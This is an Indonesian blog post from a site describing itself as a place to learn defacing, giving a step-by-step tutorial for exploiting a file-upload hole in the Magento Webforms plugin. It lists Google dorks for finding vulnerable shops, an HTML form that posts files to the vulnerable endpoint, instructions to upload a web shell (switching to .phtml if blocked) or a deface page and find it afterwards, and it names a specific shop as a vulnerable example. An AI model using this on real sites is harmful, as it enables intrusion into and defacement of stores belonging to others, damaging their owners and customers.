Tutorial Deface : Menggunakan Magento Webforms Shell Upload Vulnerabilty - Defa Squad

Defa Squad

Tempat Belajar Deface

Post Top Ad

Thursday, July 6, 2017

Home Tutorial Deface Tutorial Deface : Menggunakan Magento Webforms Shell Upload Vulnerabilty

Tutorial Deface : Menggunakan Magento Webforms Shell Upload Vulnerabilty


Kali ini gua mau Repost Artikel gua Teknik Deface Menggunakan Magento Webforms File Upload Vulnerabilty


Google Dork :

- inurl:/webforms/index/index intext:2016
- inurl:/webforms/index/index/ intext:beauty intitle:shop dll
 (kembangkan)

atau kalian bisa pakai Dork Magento Add Admin

Dork Magento Lengkap

CSRF:

kalian bisa pakai CSRF Online di Sini



atau pakai CSRF sendiri

 <form method="POST" action="https://site.Target.com/js/webforms/upload/index.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form>

Kalau pake CSRF Online  ini POST File dengan : files[]

Exploit :

www.site.com/path//js/webforms/upload/index.php

Vulnerabilty : []

Contoh site vuln : 

https://shop.destrooper.com/js/webforms/upload/index.php

Step By Step : 

1. Masukan Target , dan PostFile. kalau sudah klik Kunci Target 
 2. Upload File kamu. Bisa di upload shell tapi kalau error coba ganti ext jadi .phtml
kalau masih error upload aja script deface mu
kalau sudah , klik Upload 
 3. Nanti akan muncul angka random
  
 4. Tetak Shell atau File kita

www.site.com/[path]/js/webforms/upload/files/[angka random]/file kita.txt etc

kalau masih binggung silahkan liat vidio di bawah

 


Sumber : https://cowokerensteam.blogspot.co.id/2017/01/deface-menggunakan-magento-webforms.html
Tags
Author Image

About Unknown

at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Post Top Ad

Author Details